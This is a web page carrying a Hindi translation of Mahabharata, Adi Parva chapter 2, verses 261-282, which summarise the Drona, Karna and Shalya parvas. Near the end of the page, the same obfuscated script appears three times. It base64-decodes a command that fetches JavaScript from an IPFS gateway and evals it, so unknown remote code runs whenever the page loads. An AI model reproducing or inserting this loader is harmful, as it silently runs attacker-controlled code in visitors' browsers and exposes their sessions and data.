महाभारत आदि पर्व अध्याय 2 श्लोक 261-282

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें

द्वितीय (2) अध्‍याय: आदि पर्व (पर्वसंग्रह पर्व)

महाभारत: आदि पर्व: द्वितीय अध्याय: श्लोक 261-282 का हिन्दी अनुवाद

अर्जुन ने, संशप्तकों में से जो बच रहे थे, उन्हें भी यु़द्ध भूमि में निःशेष कर दिया। महामना संशप्तक वीरो की संख्या नौ करोड़ थी, परन्तु किरीटधारी अर्जुन ने आक्रमण करके अकेले ही उन सबको यमलोक भेज दिया। धृतराष्ट्र पुत्र, बड़े-बड़े पाषाण खण्ड लेकर युद्ध करने वाले म्लेच्छ-सैनिक, समरांगण में युद्ध के विचित्र कला कौशल का परिचय देने वाले नारायण नामक गोप, अलम्बुप, श्रुतायु, पराक्रमी जलासन्ध, भूरिश्रवा, विराट, महारथी, द्रुपद तथा घटोत्कच आदि जो बड़े-बड़े वीर मारे गये हैं, वह प्रसंग भी इसी पर्व में है। इसी पर्व में यह बात भी आयी है कि युद्ध में जब पिता द्रोणाचार्य मार गिराये गये, तब अश्वत्थामा ने भी शत्रुओं के प्रति अमर्ष में भरकर ‘नारायण’ नामक भयानक अस्त्र को प्रकट किया था। इसी में आग्नेयास्त्र तथा भगवान रूद्र के उत्तम माहात्म्य का वर्णन किया गया है। व्यास जी के आगमन तथा श्रीकृष्ण और अर्जुन के माहात्म्य की कथा भी इसी में है। महाभारत में यह सातवाँ महान् पर्व बताया गया है। कौरव-पाण्डव युद्ध में जो नरश्रेष्ठ नरेश शूरवीर बताये गये हैं, उनमें से अधिकांश में मारे जाने का प्रसंग इस द्रोण पर्व में ही आया है। तत्वदर्शी पराशरनन्दन मुनिवर व्यास ने भली- भाँति सोच विचार कर द्रोण पर्व में एक सौ सत्तर अध्यायों और आठ हजार नौ सौ नौ (8909) श्लोकों की रचना एवं गणना की है। इसके बाद अत्यन्त अद्भत कर्णपर्व का परिचय दिया गया है। इसी में परम बुद्धिमान मद्रराज शल्य को कर्ण के सारथि बनाने का प्रसंग है, फिर त्रिपुर के संहार की पुराण प्रसिद्ध कथा आयी है। युद्ध के लिये जाते समय कर्ण और शल्य में जो कठोर संवाद हुआ है, उसका वर्णन भी इसी पर्व में है। तदनन्तर हंस और कौए का आक्षेपपूर्ण उपाख्यान है। उसके बाद महात्मा अश्वत्थामा के द्वारा राजा पाण्डय के वध की कथा है। फिर दण्डसेन और दण्ड के वध का प्रसंग है। इसी पर्व में कर्ण के साथ युधिष्ठिर द्वैरथ (द्वन्द्व) युद्ध का वर्णन है, जिसमें कर्ण ने सब धर्नुधर वीरों के देखते-देखते धर्मराज युधिष्ठिर के प्राणों को संकट में डाल दिया था। तत्पश्चात् युधिष्ठिर और अर्जुन के एक दूसरे के प्रति क्रोधयुक्त उद्रार हैं, जहाँ भगवान श्रीकृष्ण ने अर्जुन को समझा-बुझाकर शान्त किया है। इसी पर्व में यह बात भी आयी है कि भीमसेन ने पहले की हुई प्रतिज्ञा के अनुसार दु:शासन का वक्षस्थल विदीर्ण करके रक्त पीया था। तदनन्तर द्वन्द्व युद्ध में अर्जुन ने महारथी कर्ण को जो मार गिराया, वह प्रसंग भी कर्णपर्व में ही है। महाभारत का विचार करने वाले विद्वानों ने इस कर्णपर्व को आठवाँ पर्व कहा है। कर्णपर्व में उनहत्तर अध्याय कहे गये हैं और चार हजार नौ सौ चौसठ (4964) श्लोकों का पाठ इस पर्व में किया गया है। तत्पश्चात् विचित्र. अर्थयुक्त विषयों से भरा हुआ शल्य पर्व कहा गया है। इसी में यह कथा आयी है कि जब कौरव सेना के सभी प्रमुख वीर मार दिये गये, तब मद्रराज शल्य सेनापति हुए। वहीं कुमार कार्तिकेय का उपाख्यान और अभिषेक कर्ण कहा गया है। साथ ही वहाँ रथियों के युद्ध का भी विभाग पूर्वक वर्णन किया गया है। शल्यपर्व में ही कुरुकुल के प्रमुख वीरों के विनाश का तथा महात्मा धर्मराज द्वारा शल्य के वध का वर्णन किया गया है। इसी में सहदेव के द्वारा युद्ध में शकुनि के मारे जाने का प्रसंग है।


« पीछे आगे »

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

टीका टिप्पणी और संदर्भ

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>